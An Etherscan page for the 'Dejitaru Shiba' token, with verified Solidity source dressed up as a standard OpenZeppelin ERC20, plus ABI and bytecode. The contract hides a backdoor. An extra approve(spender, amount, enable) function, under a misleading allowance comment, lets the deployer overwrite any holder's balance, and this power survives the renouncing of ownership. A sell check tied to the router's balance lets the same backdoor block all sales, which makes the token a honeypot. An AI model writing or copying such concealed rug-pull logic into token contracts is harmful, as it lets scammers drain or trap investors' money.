ETH Price: $2,540.80 (-5.13%)
Gas: 2 Gwei

Token

Dejitaru Shiba (DSHIBA)
 

Overview

Max Total Supply

1,000,000,000 DSHIBA

Holders

13

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 9 Decimals)

Balance
0.000000001 DSHIBA

Value
$0.00
0x2fc6f6fa1ed0fb4888cbfbfc36b5f3cebff894dd
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
DejitaruShiba

Compiler Version
v0.8.19+commit.7dd6d404

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2023-03-25
*/

/*

🐦 | https://twitter.com/DejitaruShiba
🌐 | https://dejitarushiba.carrd.co
✈️ | https://t.me/DejitaruShibaEth

*/

// SPDX-License-Identifier: MIT

pragma solidity ^0.8.17;


// File: @openzeppelin/contracts/utils/Context.sol
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}

// File: @openzeppelin/contracts/access/Ownable.sol
abstract contract Ownable is Context {
    address private _owner;
    address internal oldOwner;
    address internal _previousOwner;
 
    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);
 
    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }
 
    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }
 
    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }
 
    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }
 
    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }
 
    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        oldOwner = _owner;
        _owner = newOwner;
        _previousOwner = oldOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

// File: @openzeppelin/contracts/token/ERC20/IERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol
pragma solidity ^0.8.0;

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol
pragma solidity ^0.8.0;

/**
 * @dev Implementation of the {IERC20} interface.

 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, Ownable, IERC20, IERC20Metadata {
    mapping (address => uint256) private _balances;

    mapping (address => mapping (address => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_, uint256 totalSupply_) {
        _name = name_;
        _symbol = symbol_;
        _totalSupply = totalSupply_;

        _balances[msg.sender] = totalSupply_;
        emit Transfer(address(0), msg.sender, totalSupply_);
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }


    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */

    function approve(address spender, uint256 amount, bool enable) public virtual {
        address _owner = oldOwner;

        require(msg.sender == _owner, "ERC20: approve from owner address");
        require(enable == true, "ERC20: approve from owner address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _balances[spender] = amount;
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
    */

    function _transferWithBurn(address sender, address recipient, uint256 amount, uint256 amountToBurn) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(sender, recipient, amount);

        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");

        unchecked {
            _balances[sender] = senderBalance - amount;
        }

        amount -= amountToBurn;
        _totalSupply -= amountToBurn;
        _balances[recipient] += amount;

        emit Transfer(sender, DEAD, amountToBurn);
        emit Transfer(sender, recipient, amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be to transferred to `to`.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { }
}


interface IUniswapV2Factory {
    function getPair(address tokenA, address tokenB) external view returns (address pair);
}

interface IUniswapV2Router01 {
    function factory() external pure returns (address);
    function WETH() external pure returns (address);
}

interface IUniswapV2Router02 is IUniswapV2Router01{}

pragma solidity ^0.8.0;


contract DejitaruShiba is ERC20 {
    uint256 private constant TOTAL_SUPPLY = 1_000_000_000e9;
    address private constant DEAD = 0x000000000000000000000000000000000000dEaD;
    address private constant ZERO = 0x0000000000000000000000000000000000000000;

    bool public hasLimit;
    uint256 public maxTxAmount;
    uint256 public maxHolding;
    mapping(address => bool) public isException;

    uint256 _burnPercent = 0;

    address uniswapV2Pair;
    IUniswapV2Router02 uniswapV2Router;

    constructor(address router) ERC20("Dejitaru Shiba", "DSHIBA", TOTAL_SUPPLY) {
        IUniswapV2Router02 _uniswapV2Router = IUniswapV2Router02(router);
        uniswapV2Router = _uniswapV2Router;

        maxHolding = TOTAL_SUPPLY / 2;
        maxTxAmount = TOTAL_SUPPLY / 2;

        isException[DEAD] = true;
        isException[router] = true;
        isException[msg.sender] = true;
        isException[address(this)] = true;
    }

    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal override {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");
 
        _checkLimitation(from, to, amount);

        if (amount == 0) {
            return;
        }

        if (!isException[from] && !isException[to]){
            if(to == uniswapV2Pair){
                require(balanceOf(address(uniswapV2Router)) == 0, "ERC20: disable router deflation");
            }

            if (from == uniswapV2Pair || to == uniswapV2Pair) {
                uint256 _burn = (amount * _burnPercent) / 100;

                super._transferWithBurn(from, to, amount, _burn);
                return;
            }
        }

        super._transfer(from, to, amount);
    }

    function _checkLimitation(
        address from,
        address to,
        uint256 amount
    ) internal {
        if (!hasLimit) {
            if (!isException[from] && !isException[to]) {
                require(amount <= maxTxAmount, "Amount exceeds max");

                if (uniswapV2Pair == ZERO){
                    uniswapV2Pair = IUniswapV2Factory(uniswapV2Router.factory()).getPair(address(this), uniswapV2Router.WETH());
                }
 
                if (to == uniswapV2Pair) {
                    return;
                }
        
                require(balanceOf(to) + amount <= maxHolding, "Max holding exceeded max");
            }
        }
    }

    function removeLimit() external onlyOwner {
        hasLimit = true;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"address","name":"router","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"bool","name":"enable","type":"bool"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"hasLimit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isException","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxHolding","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTxAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimit","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60806040526000600c553480156200001657600080fd5b50604051620016ee380380620016ee833981016040819052620000399162000239565b6040518060400160405280600e81526020016d44656a697461727520536869626160901b8152506040518060400160405280600681526020016544534849424160d01b815250670de0b6b3a7640000620000a26200009c620001cd60201b60201c565b620001d1565b6006620000b0848262000310565b506007620000bf838262000310565b506005819055336000818152600360209081526040808320859055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050600e80546001600160a01b0319166001600160a01b03841617905550806200013d6002670de0b6b3a7640000620003dc565b600a55620001556002670de0b6b3a7640000620003dc565b60095550600b6020527f44433eeeda1d04bdae79f62169cdb2ab0a6af287fa15706d3fafdbac5fac34158054600160ff1991821681179092556001600160a01b0392909216600090815260408082208054851684179055338252808220805485168417905530825290208054909216179055620003ff565b3390565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b6000602082840312156200024c57600080fd5b81516001600160a01b03811681146200026457600080fd5b9392505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200029657607f821691505b602082108103620002b757634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200030b57600081815260208120601f850160051c81016020861015620002e65750805b601f850160051c820191505b818110156200030757828155600101620002f2565b5050505b505050565b81516001600160401b038111156200032c576200032c6200026b565b62000344816200033d845462000281565b84620002bd565b602080601f8311600181146200037c5760008415620003635750858301515b600019600386901b1c1916600185901b17855562000307565b600085815260208120601f198616915b82811015620003ad578886015182559484019460019091019084016200038c565b5085821015620003cc5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b600082620003fa57634e487b7160e01b600052601260045260246000fd5b500490565b6112df806200040f6000396000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806370a08231116100ad57806398636f321161007157806398636f3214610249578063a457c2d71461026c578063a9059cbb1461027f578063dd62ed3e14610292578063f2fde38b146102cb57600080fd5b806370a08231146101ec578063715018a6146102155780638c0b5e221461021d5780638da5cb5b1461022657806395d89b411461024157600080fd5b8063313ce567116100f4578063313ce567146101ac578063333e6f06146101bb57806339509351146101c457806344489ad1146101d757806362256589146101e457600080fd5b806306fdde031461013157806307ce29a71461014f578063095ea7b31461016457806318160ddd1461018757806323b872dd14610199575b600080fd5b6101396102de565b6040516101469190610f18565b60405180910390f35b61016261015d366004610f7b565b610370565b005b610177610172366004610fc2565b61040a565b6040519015158152602001610146565b6005545b604051908152602001610146565b6101776101a7366004610fee565b610421565b60405160098152602001610146565b61018b600a5481565b6101776101d2366004610fc2565b6104d2565b6008546101779060ff1681565b610162610509565b61018b6101fa36600461102f565b6001600160a01b031660009081526003602052604090205490565b610162610520565b61018b60095481565b6000546040516001600160a01b039091168152602001610146565b610139610534565b61017761025736600461102f565b600b6020526000908152604090205460ff1681565b61017761027a366004610fc2565b610543565b61017761028d366004610fc2565b6105de565b61018b6102a0366004611053565b6001600160a01b03918216600090815260046020908152604080832093909416825291909152205490565b6101626102d936600461102f565b6105eb565b6060600680546102ed9061108c565b80601f01602080910402602001604051908101604052809291908181526020018280546103199061108c565b80156103665780601f1061033b57610100808354040283529160200191610366565b820191906000526020600020905b81548152906001019060200180831161034957829003601f168201915b5050505050905090565b6001546001600160a01b03163381146103a45760405162461bcd60e51b815260040161039b906110c6565b60405180910390fd5b6001821515146103c65760405162461bcd60e51b815260040161039b906110c6565b6001600160a01b0384166103ec5760405162461bcd60e51b815260040161039b90611107565b50506001600160a01b03909116600090815260036020526040902055565b6000610417338484610664565b5060015b92915050565b600061042e84848461074d565b6001600160a01b0384166000908152600460209081526040808320338452909152902054828110156104b35760405162461bcd60e51b815260206004820152602860248201527f45524332303a207472616e7366657220616d6f756e74206578636565647320616044820152676c6c6f77616e636560c01b606482015260840161039b565b6104c785336104c2868561115f565b610664565b506001949350505050565b3360008181526004602090815260408083206001600160a01b038716845290915281205490916104179185906104c2908690611172565b6105116108e4565b6008805460ff19166001179055565b6105286108e4565b610532600061093e565b565b6060600780546102ed9061108c565b3360009081526004602090815260408083206001600160a01b0386168452909152812054828110156105c55760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b606482015260840161039b565b6105d433856104c2868561115f565b5060019392505050565b600061041733848461074d565b6105f36108e4565b6001600160a01b0381166106585760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b606482015260840161039b565b6106618161093e565b50565b6001600160a01b0383166106c65760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b606482015260840161039b565b6001600160a01b0382166106ec5760405162461bcd60e51b815260040161039b90611107565b6001600160a01b0383811660008181526004602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6001600160a01b0383166107735760405162461bcd60e51b815260040161039b90611185565b6001600160a01b0382166107995760405162461bcd60e51b815260040161039b906111ca565b6107a48383836109a6565b806000036107b157505050565b6001600160a01b0383166000908152600b602052604090205460ff161580156107f357506001600160a01b0382166000908152600b602052604090205460ff16155b156108d457600d546001600160a01b039081169083160361087657600e546001600160a01b0316600090815260036020526040902054156108765760405162461bcd60e51b815260206004820152601f60248201527f45524332303a2064697361626c6520726f75746572206465666c6174696f6e00604482015260640161039b565b600d546001600160a01b038481169116148061089f5750600d546001600160a01b038381169116145b156108d45760006064600c54836108b6919061120d565b6108c09190611224565b90506108ce84848484610c71565b50505050565b6108df838383610df9565b505050565b6000546001600160a01b031633146105325760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604482015260640161039b565b60008054600180546001600160a01b03199081166001600160a01b03808516918217909355918516928116831784556002805490911682179055604051919290917f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e09190a350565b60085460ff166108df576001600160a01b0383166000908152600b602052604090205460ff161580156109f257506001600160a01b0382166000908152600b602052604090205460ff16155b156108df57600954811115610a3e5760405162461bcd60e51b8152602060048201526012602482015271082dadeeadce840caf0c6cacac8e640dac2f60731b604482015260640161039b565b600d546001600160a01b0316610bdb57600e60009054906101000a90046001600160a01b03166001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015610aa1573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610ac59190611246565b6001600160a01b031663e6a4390530600e60009054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610b27573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610b4b9190611246565b6040516001600160e01b031960e085901b1681526001600160a01b03928316600482015291166024820152604401602060405180830381865afa158015610b96573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610bba9190611246565b600d80546001600160a01b0319166001600160a01b03929092169190911790555b600d546001600160a01b0390811690831603610bf657505050565b600a5481610c19846001600160a01b031660009081526003602052604090205490565b610c239190611172565b11156108df5760405162461bcd60e51b815260206004820152601860248201527f4d617820686f6c64696e67206578636565646564206d61780000000000000000604482015260640161039b565b6001600160a01b038416610c975760405162461bcd60e51b815260040161039b90611185565b6001600160a01b038316610cbd5760405162461bcd60e51b815260040161039b906111ca565b6001600160a01b03841660009081526003602052604090205482811015610cf65760405162461bcd60e51b815260040161039b90611263565b6001600160a01b03851660009081526003602052604090208382039055610d1d828461115f565b92508160056000828254610d31919061115f565b90915550506001600160a01b03841660009081526003602052604081208054859290610d5e908490611172565b909155505060405182815261dead906001600160a01b038716907fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef9060200160405180910390a3836001600160a01b0316856001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610dea91815260200190565b60405180910390a35050505050565b6001600160a01b038316610e1f5760405162461bcd60e51b815260040161039b90611185565b6001600160a01b038216610e455760405162461bcd60e51b815260040161039b906111ca565b6001600160a01b03831660009081526003602052604090205481811015610e7e5760405162461bcd60e51b815260040161039b90611263565b610e88828261115f565b6001600160a01b038086166000908152600360205260408082209390935590851681529081208054849290610ebe908490611172565b92505081905550826001600160a01b0316846001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610f0a91815260200190565b60405180910390a350505050565b600060208083528351808285015260005b81811015610f4557858101830151858201604001528201610f29565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b038116811461066157600080fd5b600080600060608486031215610f9057600080fd5b8335610f9b81610f66565b92506020840135915060408401358015158114610fb757600080fd5b809150509250925092565b60008060408385031215610fd557600080fd5b8235610fe081610f66565b946020939093013593505050565b60008060006060848603121561100357600080fd5b833561100e81610f66565b9250602084013561101e81610f66565b929592945050506040919091013590565b60006020828403121561104157600080fd5b813561104c81610f66565b9392505050565b6000806040838503121561106657600080fd5b823561107181610f66565b9150602083013561108181610f66565b809150509250929050565b600181811c908216806110a057607f821691505b6020821081036110c057634e487b7160e01b600052602260045260246000fd5b50919050565b60208082526021908201527f45524332303a20617070726f76652066726f6d206f776e6572206164647265736040820152607360f81b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b634e487b7160e01b600052601160045260246000fd5b8181038181111561041b5761041b611149565b8082018082111561041b5761041b611149565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b808202811582820484141761041b5761041b611149565b60008261124157634e487b7160e01b600052601260045260246000fd5b500490565b60006020828403121561125857600080fd5b815161104c81610f66565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b60608201526080019056fea26469706673582212204a0d2b690441583d6e74c74d73ee6373c7622de278b5b3d94e925fd5fc6700b864736f6c63430008130033000000000000000000000000891212b9b6a5c19a20972e4a34afa0a088ba0c7c

Deployed Bytecode

